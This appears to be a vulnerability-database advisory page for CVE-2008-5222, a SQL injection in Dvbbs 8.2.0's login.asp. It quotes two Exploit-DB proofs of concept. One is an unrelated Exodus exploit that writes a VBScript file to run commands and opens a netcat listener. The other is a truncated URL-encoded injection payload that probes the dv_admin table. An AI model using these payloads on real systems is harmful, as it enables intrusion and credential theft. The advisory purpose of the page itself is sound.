CVE-2008-5222
published 2008-11-25CVE-2008-5222: SQL injection vulnerability in login.asp in Dvbbs 8.2.0 allows remote attackers to execute arbitrary SQL commands via the username parameter.
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.00%
58.6th percentile
SQL injection vulnerability in login.asp in Dvbbs 8.2.0 allows remote attackers to execute arbitrary SQL commands via the username parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dvbbs | dvbbs | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)
exploitdb·2008-11-20
CVE-2008-6937 Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)
Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)
---
> testfile
echo Dim wshShell >> testfile
echo Set wshShell = CreateObject("WScript.Shell") >> testfile
echo wshShell.Run("cmd /c start calc") >> testfile
echo ^ >> testfile
nc -L -s 192.168.0.1 -p 5222 -vv
click me
click me
# milw0rm.com [2008-11-20]
Exploit-DB
dvbbs 8.2 - 'login.asp' Multiple SQL Injections
exploitdb·2008-05-29
CVE-2008-5222 dvbbs 8.2 - 'login.asp' Multiple SQL Injections
dvbbs 8.2 - 'login.asp' Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/29429/info
The 'dvbbs' program is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect dvbbs 8.2; other versions may also be affected.
http:///www.example.com/?password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253
D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%
No writeups or analysis indexed.
http://secunia.com/advisories/30455http://securityreason.com/securityalert/4635http://www.securityfocus.com/archive/1/492753/100/0/threadedhttp://www.securityfocus.com/bid/29429https://exchange.xforce.ibmcloud.com/vulnerabilities/42731http://secunia.com/advisories/30455http://securityreason.com/securityalert/4635http://www.securityfocus.com/archive/1/492753/100/0/threadedhttp://www.securityfocus.com/bid/29429https://exchange.xforce.ibmcloud.com/vulnerabilities/42731
2008-11-25
Published